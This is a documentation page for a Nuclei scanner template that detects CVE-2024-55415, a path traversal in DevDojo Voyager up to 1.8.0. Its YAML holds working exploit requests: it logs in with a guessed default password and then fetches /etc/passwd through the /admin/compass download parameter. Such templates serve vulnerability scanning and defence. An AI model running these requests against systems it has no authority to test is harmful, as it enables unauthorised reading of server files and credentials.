DevDojo Voyager <=1.8.0 - Arbitrary File Read
ID: CVE-2024-55415
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,devdojo,voyager,lfr,lfi
Description
Section titled “Description”DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the /admin/compass.
YAML Source
Section titled “YAML Source”id: CVE-2024-55415
info: name: DevDojo Voyager <=1.8.0 - Arbitrary File Read author: iamnoooob,rootxharsh,pdresearch severity: high description: | DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the /admin/compass. reference: - https://www.sonarsource.com/blog/the-tainted-voyage-uncovering-voyagers-vulnerabilities/ - https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerCompassController.php#L213 - https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerCompassController.php#L44 - https://nvd.nist.gov/vuln/detail/CVE-2024-55415 classification: cve-id: CVE-2024-55415 epss-score: 0.00045 epss-percentile: 0.1783 metadata: verified: true max-request: 4 shodan-query: title:"Voyager" tags: cve,cve2024,devdojo,voyager,lfr,lfi
variables: password: "password"
http: - raw: - | GET /admin/login HTTP/1.1 Host: {{Hostname}}
extractors: - type: regex part: body internal: true name: csrf group: 1 regex: - 'name="_token" value="([a-zA-Z0-9]+)"'
- raw: - | POST /admin/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
_token={{csrf}}&email={{username}}&password={{password}}&
matchers: - type: dsl dsl: - "contains(body,'/admin</title>')" - "status_code == 302" condition: and internal: true
- raw: - | GET /admin/compass?download={{base64('/etc/passwd')}} HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - regex('root:.*:0:0:', body) - status_code == 200 condition: and# digest: 4b0a00483046022100c2eb030fb15a6960ee28588014d7565df0d4282f0c6ff810eeef240a610f1f930221008bc7b430bd98664e0b8c257a7412d2be5b6a8b972ea250a3126dbb5cd1dacb86:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-55415.yaml"